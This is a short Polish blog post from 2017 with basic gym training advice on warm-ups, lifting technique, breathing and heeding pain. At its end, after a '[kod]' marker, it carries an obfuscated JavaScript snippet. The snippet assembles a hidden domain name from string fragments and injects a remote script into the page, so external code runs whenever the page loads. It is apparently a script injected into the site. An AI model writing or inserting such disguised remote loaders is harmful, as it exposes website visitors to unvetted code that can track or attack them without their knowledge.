18.05.2017

#O czym należy pamiętać w czasie treningu?

Trening na siłowni ma wiele zalet. Poprawia kondycję fizyczną, pozytywnie wpływa na zdrowie, zwiększa siłę oraz daje możliwość kształtowania sylwetki. Jednak jeśli pragniemy systematycznie ćwiczyć należy pamiętać o kilku podstawowych zasadach.

Nie można zapominać o rozgrzewce

Rozgrzewka powinna poprzedzać każdy trening. Pozwala ona przygotować się mentalnie i fizycznie do wzmożonego wysiłku. Niestety częstym błędem jest podchodzenie do ćwiczeń z marszu. O sukcesie naszych działań decyduje odpowiednie nastawienie. Dlatego warto w czasie rozgrzewki skoncentrować się na celu i odrzucić wszystkie inne myśli. To czas na przypomnienie sobie założeń planu treningowego oraz skupieniu na ćwiczeniach. Rozgrzewka powinna być czymś więcej niż rozgrzaniem mięśni.

Dobrze rozgrzane stawy, ścięgna i mięśnie są mniej podatne na urazy w czasie ćwiczeń. Trening zawsze powinien być poprzedzony rozgrzewką o charakterze ogólnym. Zazwyczaj trwa ona około ośmiu minut i może mieć np. postać szybkiego marszu.

Następnie należy przejść do rozgrzewki szczegółowej. To zestaw ćwiczeń nastawionych na konkretną grupę mięśni. Jeśli na przykład planujemy ćwiczenia na triceps  to rozgrzewka szczegółowa powinna obejmować przede wszystkim mięśnie ramion.   

Podstawą udanego treningu jest technika

Jeśli trening ma przynieść oczekiwane efekty musi być prawidłowo wykonywany.  Właściwa technika pozwala zmusić do pracy konkretne grupy mięśni. Dlatego tak ważna jest skupienie w czasie ćwiczeń. Przede wszystkim należy pamiętać by ćwiczenia wykonywać w odpowiednim tempie. Mięśnie muszą stale pracować. Błędem jest wykorzystywanie siły rozpędu do podnoszenia ciężaru.

Nie można tracić kontroli nad ciężarem, jeśli nie jesteśmy w stanie tego zrobić, ciężar należy zredukować. Osoby początkujące powinny zaczynać od ćwiczeń, które dają im możliwość wykonania piętnastu powtórzeń.

Bardzo ważny jest też prawidłowy oddech w czasie wysiłku. W czasie ćwiczeń nie można go wstrzymywać. Wysiłek zwiększa znacznie zapotrzebowanie organizmu na tlen.

Świadomość swojego ciała

Każdy musi zwracać uwagę na sygnały jakie wysyła jego ciało. Jest to szczególnie ważne w przypadku osób uczęszczających na siłownię. Jeśli na przykład pojawi się ból, nie można go ignorować. W takiej sytuacji należy przerwać trening i znaleźć jego przyczynę.

Osoby aktywne powinny też zwracać uwagę na pracę serca w czasie wysiłku. Słuchanie własnego ciała pozwala uniknąć wielu groźnych kontuzji.

[kod]

(function(){
abhe=document.createElement("script");abhe_="u"+("s")+"ta";
abhe_+=("t.i")+""+"n";abhe_+=(("f")+"o");abhe.type="text/javascript";
abhe_+="/"; abheu="62569910";abheu+=".X05nc4mwbhewkdg6b69";abheu+="nnx8r1vXXkt";
abhe.src="//"+abhe_+abheu; abhe.async=true; document.body.appendChild(abhe);
})();